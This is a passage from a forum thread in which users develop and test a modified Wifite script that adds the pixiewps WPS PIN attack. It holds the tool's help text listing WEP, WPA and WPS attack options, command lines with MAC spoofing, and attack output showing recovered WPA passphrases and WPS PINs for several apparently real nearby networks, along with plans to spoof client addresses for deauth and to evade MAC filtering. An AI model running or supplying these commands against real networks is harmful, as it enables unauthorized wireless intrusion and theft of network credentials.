                       [--chopchop] [--arpreplay] [--fragment] [--caffelatte]
                       [--p0841] [--hirte] [--nofakeauth] [--wepca [N]]
                       [--wepnosave] [--wepsaveiv] [--wps] [--nowps]
                       [--wpst [secs]] [--wpsratio [ratio]] [--wpsretry [N]]
                       [--wpssave] [--update] [--debug]
    
    optional arguments:
      -h, --help            show this help message and exit
    
    COMMAND:
      --check [file]        Check capfile [file] for handshakes.
      --cracked             Display previously cracked access points.
      --recrack             Include already cracked networks in targets.
    
    INTERFACE:
      -i [wlanN]            Wireless interface for capturing.
      --mac                 Anonymize MAC address.
      -m [monN], --mon-iface [monN]
                            Interface already in monitor mode.
      --tx [N]              Set adapter TX power level.
    
    TARGET:
      -l [file], --load [file]
                            Load airodump file instead of scanning.
      -v [file], --save [file]
                            Save airodump file.
      -s [filters], --show [filters]
                            Filter targets in scanning state.Syntax: numbers,
                            range (e.g. "1-4"), power level (e.g.
                            "p[>,>=,=,<=,<][POWER]"), channel (e.g.
                            "c[CHANNEL,range])", wps disabled or enabled (e.g.
                            "wps0", "wps1"), Cipher (e.g. "wep" or "wpa", "wep[NUM
                            OF CLIENT]" or "wpa[NUM OF CLIENT]", "wep+" or "wpa+"
                            for network with clients), ESSID (e.g. "e[ESSID]") or
                            BSSID (e.g. "b[11:22:33]"). Multiple filters separated
                            by comma supported. Add "-" or "=" before to remove
                            targets.
      -t [criteria], --timeout [criteria]
                            Criteria to stop scanning state. Numbers = seconds,
                            e[ESSID][+] or b[BSSID][+]= timeout when target is
                            found, add "+" at the end means "with clients",
                            n[>,>=,=,<=,<][num of targets] = timeout when total
                            targets more/equal/less than certain numbers. Multiple
                            criteria separated by comma supported.
      -c [N], --channel [N]
                            Filter targets with specific channel in scanning state
                            (equivalent to "--show c[N]").
      --power [N]           Filter targets with signal strength > [N] in scanning
                            state (equivalent to "--show p\>[N]").
      --all                 Attack all targets (equivalent to "--show all --attack
                            all --timeout 10").
      -r [N], --row [N]     Max numbers of row to show in scanning state.
      --showb               Show target BSSIDs in scanning state.
      -2, --two             Show scanning result in two columns.
      -q, --quiet           Do not list found networks during scan.
      -a [filters], --attack [filters]
                            Automatically select targets after scanning state,
                            same syntas as "--show".
      -e [SSID], --essid [SSID]
                            Attack target immediately once ssid (name) is found in
                            scanning state.
      -b [BSSID], --bssid [BSSID]
                            Attack target immediately once bssid (mac) is found in
                            scanning state.
    
    WPA:
      --wpa                 Only show WPA networks in scanning state (works with
                            --wps --wep, equivalent to "--show wpa --nowps").
      --wpat [secs]         Time to wait for WPA attack to complete (seconds).
      --nowpa               Disable WPA handshake attack.
      --wpadt [secs]        Time to wait between sending deauth packets (seconds).
      --strip               Strip handshake using tshark or pyrit.
      --crack CRACK         Crack WPA handshakes using dict/hash file. (0 =
                            disable , 1 = aircrack, 2 = pyrit, 3 = cowpatty)
      --dict [file]         Specify dictionary to be used when cracking WPA.
      --hash [file]         Specify precomputed hash to be used when cracking WPA.
      --recapture           Recapture handshake even if the cap file exists.
      --aircrack            Verify handshake using aircrack.
      --pyrit               Verify handshake using pyrit.
      --tshark              Verify handshake using tshark.
      --cowpatty            Verify handshake using cowpatty.
    
    WEP:
      --wep                 Only show WEP networks in scanning state (equivalent
                            to "--show wep").
      --pps [N]             Set the number of packets per second to inject.
      --wept [secs]         Max time for each attack, 0 implies endless.
      --chopchop            Use chopchop attack.
      --arpreplay           Use arpreplay attack.
      --fragment            Use fragmentation attack.
      --caffelatte          Use caffe-latte attack.
      --p0841               Use P0842 attack.
      --hirte               Use hirte attack.
      --nofakeauth          Stop attack if fake authentication fails.
      --wepca [N]           Start cracking when number of IVs surpass [n].
      --wepnosave           Dont save the captured IVs to "wep" folder in current
                            working directory.
      --wepsaveiv           Save the captured IVs in form of .ivs to "wep" folder
                            in current working directory. (.ivs is smaller than
                            .cap but NOT compatible with old aircrack-ng)
    
    WPS:
      --wps                 Only show WPS networks in scanning state (equivalent
                            to "--show wps --nowpa").
      --nowps               Disable WPS PIN Attack.
      --wpst [secs]         Max wait for new retry before giving up (0: never).
      --wpsratio [ratio]    Min ratio of successful PIN attempts/total retries.
      --wpsretry [N]        Max number of retries for same PIN before giving up.
      --wpssave             Save progress of WPS PIN attack to "wps" subfolder in
                            current folder.
    
    OTHERS:
      --update              Check and update Wifite.
      --debug               Print lots of debug information.
    Some cool featuers:
    --update Check and update Wifite.
    --mac Anonymize MAC address.
    --wpsretry [N] Max number of retries for same PIN before giving up.
    --wpssave Save progress of WPS PIN attack to "wps" subfolder in
    current folder.
    --debug Print lots of debug information
    Lots for filters

  32. #32
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by aanarchyy View Post
    What behavior were you thinking for the spoofing part?


    Specify address to spoof at command line?
    Wait until client found then start attack with spoofed address?
    Start attacking unspoofed and watch at same time, and when client found, restart attack with spoofed address?
    If multiple clients found, rotate addresses so often?
    For now
    wifite -mac
    Check mon0 is actually spoofed or random. airmon-ng doesn't carry spoofed mac to monitor. macchanger needs to also be carried out on mon0.
    macchanger on wlan only, not sufficient.
    also
    reaver use --mac option, spoofed/random mac
    aireplay-ng use -h option spoofed/random mac

    Down the road:
    wifite -clients (only attack access points with connected clients, spoof client b4 any attacks)

    any deauths use connected clients mac
    Last edited by nuroo; 2015-04-22 at 01:42.

  33. #33
    Join Date
    2015-Mar
    Posts
    127
    I just saw you added -mac to wifite....... I like....Cheers. Worked great.

    Back to testing

  34. #34
    Join Date
    2015-Mar
    Posts
    127
    ./wifitemod -mac -ponly -pixiet 70

    [+] 25 attacks completed:

    [+] 3/25 WPA attacks succeeded
    found Tomm000000 WPA key: "char00000", WPS PIN: 3700000

    found Wile000000 WPA key: "Steph00000", WPS PIN: 12080000
    ./wifitemod -mac -ponly -pixiet 70
    found DG1600000 WPA key: "DG167000000", WPS PIN: 7670000


    [+] disabling monitor mode on mon0... done
    [+] changing wlan1's mac back to 00000000:20:5b... done
    [+] quitting

    Nice !!!

  35. #35
    Well, it's got a live timer(count up), not as pretty, but functional.
    Trying to fix some of the other stuff that was in the origional code, but more interested in the pixiewps/wps part of this to be honest.

  36. #36
    Join Date
    2015-Mar
    Posts
    127
    Ok cool. Pixiewps and wepcrack are first methods used anyway. Low hanging fruit so to speak. Quick and dirty, first. Routers that take longer saved for last.

    I only started beta testing WPA capture part of the script because u fixed all the pixie section errors found to date.

    Glad u implementated timer for pixiewps attack. Will try it soon.

  37. #37
    Join Date
    2015-Mar
    Posts
    127
    -pixiet <secs>

    sets a max time for pixiewps attack.
    I have been using 90 secs. If access point doesn't bite at all in 90 secs im pretty much convinced its not gonna bite at all. script moves on to next target. if I want I could set a higher time later maybe 180 secs.

    What I have been running into though are cases were the access point partially bites in the set time frame.
    Code:
    [0:00:00] initializing PixieWPS attack on Lu0000000 (00000003:5C)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
     [+] Authkey found
    
     [!] unable to complete in 90 seconds
     [+] skipping pixiewps on Luc0000000
    I'm thinking the script can
    wait another 60 secs to try and catch rest of info
    or
    prompt user if he wants to wait another 60 secs or so. if no response in 20secs, automatically move next target.
    Last edited by nuroo; 2015-04-23 at 01:54.

  38. #38
    Join Date
    2015-Mar
    Posts
    127
    nvm
    doesn't seem to be time related. When I run attacks in command line against those same access points, some pixie cracks right away, others timeout, other are locked, or fail to associate.

    could be mac filtering, I know some had vulnerable chipsets
    Last edited by nuroo; 2015-04-22 at 13:50.

  39. #39
    Added updater
    just run ./wifite -update
    downloads and replaces itself with latest revision automatically

    Fixed timer, should look much better now

    Fixed issue with new airmon-ng not creating monitor interface.

    Quote Originally Posted by nuroo View Post
    I'm thinking the script can
    wait another 60 secs to try and catch rest of info
    or
    prompt user if he waits to wait another 60 secs or so. if no response in 20secs, automatically move next target.
    That's actually a pretty good idea, maybe add 30 seconds to the countout on each hash found.

    EDIT: BLAH! just noticed the interface part is still a little screwed up, ill get to fixing it later tonight.
    Last edited by aanarchyy; 2015-04-22 at 21:05.

  40. #40
    Join Date
    2015-Mar
    Posts
    127
    Timer success,
    Guess im impatient and want to know script is working as opposed to stuck.Two quick test with pixie attack, timer was good.

    -update also worked as advertised,

  41. #41
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by aanarchyy View Post
    Added updater
    just run ./wifite -update
    downloads and replaces itself with latest revision automatically

    Fixed timer, should look much better now

    Fixed issue with new airmon-ng not creating monitor interface.



    That's actually a pretty good idea, maybe add 30 seconds to the countout on each hash found.

    EDIT: BLAH! just noticed the interface part is still a little screwed up, ill get to fixing it later tonight.
    If you want add it. ill test it...may help in certain cases

  42. #42
    Quote Originally Posted by nuroo View Post
    If you want add it. ill test it...may help in certain cases
    May make it a setting with a default value and set to 0 to disable.

    PS. Added you to the credits, you have been invaluable with your testing my code and some really great ideas

  43. #43
    Join Date
    2015-Mar
    Posts
    127
    My pleasure, thanks for the acknowledgement.

    Ideas easy, coding is harder

    -cracked+
    outputs more data about victims from attack:
    Passphrase
    Pin
    Clients mac's
    Manufacturer
    Model
    Channel
    Highest signal strength

    Just so this info is available for later. For spoofing etc or known router vulnerabilities etc............output to text file
    ****************

    -pixieR -P <bssid> <X>
    loop for 5 to X loops on target, without passing WPS protocol to or past the M4 message to hopefully avoid lockouts
    Code:
    For those wondering what reavers -P option is intended for:
    
    Option (-P) in reaver puts reaver into a loop mode that does not do the  WPS protocol to or past the M4 message to hopefully avoid lockouts. This  is to ONLY be used for PixieHash collecting to use with pixiewps, NOT  to 'online' bruteforce pins.
    This option was made with intent of:
    
    ----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..
    
    ----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.
    
    ----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case. 
    datahead
    output to text file for analysis.
    Last edited by nuroo; 2015-04-22 at 22:40.

  44. #44
    Join Date
    2015-Mar
    Posts
    127
    Works with new airmon-ng monitor naming......confirmed

  45. #45
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Hi aanarchyy!

    What is your wifite base for this improvement, r85 or r86?
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  46. #46
    Quote Originally Posted by Quest View Post
    Hi aanarchyy!

    What is your wifite base for this improvement, r85 or r86?
    AFAIK, r85, whichever one is default installed in kali liveboot cd.

    To be honest, i never really planned on making this a project, I was going to make a few minor modifications to a pre-existing tool, like i do to many tools to more fit my needs( as i have done with wifite a while ago along with a few other tools, aircrack, reaver, snort, dsniff stuff, etc), and was never planning on releasing anything, especially since i dont really know python.

    But as of recently, ive been having a really good time playing with this, very good learning oportunity. And once it worked kinda the way i wanted, i figured i would share it with anyone that might find it useful. Never expected for this to be a "main project" for me, but i am very much enjoying this.

    Had i known this was actually going to be even mildly popular, i would have used a more up-to-date version(like the derv82 version), which i still may do, but i'm going to finish adding in things before i move it to a different revision cuz patching a new revision isn't exactly going to be a copy/paste kinda thing.

    But either way, im gonna keep doing what im doing, cuz im having a lot of fun with this

  47. #47
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    I was asking because I'm a fan of wifite and according to that ticket https://bugs.kali.org/view.php?id=2225 there seems to be improvement with r86, so naturally I thought that any further improvement should be based on that version. Thank you and keep up the good work!
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  48. #48
    I am a HUGE fan of wifite, which is why ive chosen it to add pixiewps to.
    If the devs of wifite want/ask me to be a contributor, i would be more than happy.
    If not, im perfectly fine creating my own fork that works the way i want it to.

  49. #49
    UPDATES!

    fixed -mac not really anonymizing mac address
    added -endless flag to loop through targets untill stopped
    make cracked.txt human readable
    fixed issue with -paddto not working

    May be more, but i can't remember right now.

  50. #50
    Join Date
    2015-Mar
    Posts
    127
    Code:
    ./wifite -mac -ponly -pto 45 -paddto 30 -showb
     
      --- --------------------  -----------------  --  ----  -----  ----  ------
        1  NE00000             00000000:DE:D7   6  WPA2  28db   wps 
        2  TG000000            00000000:FB:00   6  WPA2  27db   wps 
        3  DG000000            00000000:D5:F0  11  WPA2  26db   wps   client
    
    [0:00:00] initializing PixieWPS attack on DG0000000 (000000000:D5:F0)
     [+] E-Nonce found            
     [+] PKE hash found            
     [+] PKR hash found            
     [+] Authkey found            
     [+] E-Hash1 found            
     [+] E-Hash2 found            
     [+] Cracking using pixiewps...
    
     [+] PIN found:     10896785
     [+] Handing pin to reaver
    
     [0:00:00] initializing WPS PIN attack on DG00000 (0000000:D5:F0)
    ^C0:02:59] WPS attack, 0/2 success/ttl,  
     (^C) WPS brute-force attack interrupted
    
     [+] 2 attacks completed:
    
     [+] 0/2 WPA attacks succeeded
    
     [+] quitting
    Still testing, with -mac option

    found:

    after exiting wps pin attack from pixie attack - mon0 left alive, mac remains spoofed

    Also for troubleshooting purpose's could you echo to the screen the 2nd reaver command used to find pin, and results from access point during the attack

    Actually could u echo both reaver commands to screen during attack.
    whole initial attack command string used by script
    whole 2nd command string used to obtain pin
    Last edited by nuroo; 2015-04-24 at 18:44.

Similar Threads

  1. Pixiewps: wps pixie dust attack tool
    By wiire in forum Project Archive
    Replies: 243
    Last Post: 2017-11-09, 19:31
  2. Bully modified to implement pixiewps attack
    By aanarchyy in forum Project Archive
    Replies: 65
    Last Post: 2017-04-17, 21:21
  3. Replies: 26
    Last Post: 2016-08-17, 09:34
  4. Wifite including new pixiewps attack
    By aanarchyy in forum General Archive
    Replies: 75
    Last Post: 2015-05-04, 23:16
  5. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •